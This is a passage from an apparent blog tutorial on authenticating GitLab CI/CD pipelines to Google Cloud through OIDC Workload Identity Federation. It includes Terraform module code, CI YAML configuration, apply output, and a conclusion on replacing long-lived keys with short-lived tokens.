&lt;p&gt;The &lt;a href="https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules" rel="noopener noreferrer"&gt;Terraform &lt;code&gt;oidc&lt;/code&gt; module&lt;/a&gt; does the following:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Workload Identity Pool Creation:&lt;br&gt;
    - Creates a new Google Cloud Workload Identity Pool with an ID derived from either a provided &lt;code&gt;workload_identity_name&lt;/code&gt; or &lt;code&gt;gitlab_project_id&lt;/code&gt;.&lt;br&gt;
    - Associates the pool with a Google Cloud project specified by &lt;code&gt;google_project_id&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Workload Identity Provider Creation:&lt;br&gt;
    - Creates a new Google Cloud Workload Identity Provider inside the previously created pool (the provider's ID is derived similarly to the pool ID).&lt;br&gt;
    - Sets conditions for attribute mapping based on the provided parameters.&lt;br&gt;
    - Maps attributes from the OIDC token to attributes understood by Google Cloud IAM.&lt;br&gt;
    - Configures OIDC settings such as the issuer URI (&lt;code&gt;gitlab_url&lt;/code&gt;) and allowed audiences (&lt;code&gt;allowed_audiences&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Permission Granting:&lt;br&gt;
    - Grants permissions for Service Account impersonation by creating IAM bindings.&lt;br&gt;
        - For each service account specified in &lt;code&gt;var.oidc_service_account&lt;/code&gt;, it binds the role &lt;code&gt;roles/iam.workloadIdentityUser&lt;/code&gt;.&lt;br&gt;
    - Grants access to the principal set of the previously created identity pool for each service account.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
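
&lt;p&gt;Stripped of the module's variables and conditionals, those three steps map onto roughly these resources (a simplified sketch for orientation, not the module's exact source; attribute names abbreviated):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight terraform"&gt;&lt;code&gt;resource "google_iam_workload_identity_pool" "gitlab" {
  project                   = var.google_project_id
  workload_identity_pool_id = "gl-id-pool-oidc-${var.gitlab_project_id}"
}

resource "google_iam_workload_identity_pool_provider" "gitlab" {
  workload_identity_pool_id          = google_iam_workload_identity_pool.gitlab.workload_identity_pool_id
  workload_identity_pool_provider_id = "gitlab-jwt-${var.gitlab_project_id}"

  # Map claims from the GitLab JWT onto Google Cloud IAM attributes
  attribute_mapping = {
    "google.subject"       = "assertion.sub"
    "attribute.project_id" = "assertion.project_id"
  }

  oidc {
    issuer_uri        = var.gitlab_url
    allowed_audiences = var.allowed_audiences
  }
}

resource "google_service_account_iam_member" "impersonation" {
  for_each = var.oidc_service_account

  service_account_id = "projects/${var.google_project_id}/serviceAccounts/${each.value.sa_email}"
  role               = "roles/iam.workloadIdentityUser"
  member             = "principalSet://iam.googleapis.com/${google_iam_workload_identity_pool.gitlab.name}/${each.value.attribute}"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;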

&lt;p&gt;Our &lt;code&gt;main.tf&lt;/code&gt; file will look like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight terraform"&gt;&lt;code&gt;&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="s2"&gt;"gitlab_oidc"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;source&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"./modules/oidc"&lt;/span&gt;

  &lt;span class="nx"&gt;google_project_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;google_project_id&lt;/span&gt;
  &lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt;
  &lt;span class="nx"&gt;oidc_service_account&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="s2"&gt;"sa"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;sa_email&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;service_account_email&lt;/span&gt;
      &lt;span class="nx"&gt;attribute&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"attribute.project_id/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gitlab_project_id&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output of a &lt;code&gt;terraform apply&lt;/code&gt; provides the information we need to migrate our existing pipelines to OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
workload_identity_pool = "projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716"
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Making use of the &lt;a href="https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules/-/raw/3.1.2/templates/gcp_auth.yaml" rel="noopener noreferrer"&gt;CI Template&lt;/a&gt; provided by GitLab's infrastructure security team, we can add these variables to our pipeline to authenticate via OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;include&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;remote&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://gitlab.com/gitlab-com/gl-security/security-operations/infrastructure-security-public/oidc-modules/-/raw/3.1.2/templates/gcp_auth.yaml'&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;template&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Terraform/Base.gitlab-ci.yml"&lt;/span&gt;

&lt;span class="na"&gt;variables&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;WI_POOL_PROVIDER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;//iam.googleapis.com/projects/458331852021/locations/global/workloadIdentityPools/gl-id-pool-oidc-55282716/providers/gitlab-jwt-55282716&lt;/span&gt;
  &lt;span class="na"&gt;SERVICE_ACCOUNT&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terraform@oidc-demo-415417.iam.gserviceaccount.com&lt;/span&gt;

&lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;extends&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.google-oidc:auth&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.terraform:build&lt;/span&gt;

&lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;extends&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.google-oidc:auth&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;.terraform:deploy&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
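
&lt;p&gt;The &lt;code&gt;.google-oidc:auth&lt;/code&gt; job works by requesting a GitLab ID token and writing a credential configuration file that the Google auth libraries pick up. Conceptually, it does something like the following (a simplified sketch; refer to the template itself for the exact contents):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;.google-oidc:auth:
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  before_script:
    - echo "$GITLAB_OIDC_TOKEN" &amp;gt; "$CI_BUILDS_DIR/.oidc_token"
    - gcloud iam workload-identity-pools create-cred-config "$WI_POOL_PROVIDER"
        --service-account="$SERVICE_ACCOUNT"
        --credential-source-file="$CI_BUILDS_DIR/.oidc_token"
        --output-file="$CI_BUILDS_DIR/.gcp_cred_config.json"
    - export GOOGLE_APPLICATION_CREDENTIALS="$CI_BUILDS_DIR/.gcp_cred_config.json"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;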



&lt;p&gt;Now that we have this in place, we can create resources using OIDC:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight terraform"&gt;&lt;code&gt;&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="s2"&gt;"compute_engine"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;source&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"./modules/compute-engine"&lt;/span&gt;

  &lt;span class="nx"&gt;instance_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"oidc-demo-instance"&lt;/span&gt;
  &lt;span class="nx"&gt;zone&lt;/span&gt;          &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"us-central1-a"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And we can see that the resource is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;Terraform has been successfully initialized!
module.gitlab_oidc.google_iam_workload_identity_pool.gitlab_pool: Creating...
module.compute_engine.google_compute_instance.default: Creating...
module.compute_engine.google_compute_instance.default: Still creating... [10s elapsed]
module.compute_engine.google_compute_instance.default: Creation complete after 13s [id=projects/oidc-demo-415417/zones/us-central1-a/instances/oidc-demo-instance]
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This article highlights the security and automation benefits of Workload Identity Federation for connecting GitLab pipelines to Google Cloud. By automatically exchanging pipeline identities for short-lived IAM access tokens, Workload Identity Federation removes the risks of long-lived credentials while still granting pipelines the access they need. With minimal setup, pipelines can securely deploy to Google Cloud without managing static keys. Stay safe out there!&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://about.gitlab.com/blog/2023/06/28/introduction-of-oidc-modules-for-integration-between-google-cloud-and-gitlab-ci/" rel="noopener noreferrer"&gt;How OIDC can simplify authentication of GitLab CI/CD pipelines with Google Cloud&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>devops</category>
      <category>cloud</category>
      <category>gitlab</category>
      <category>googlecloud</category>
    </item>
  </channel>
</rss>
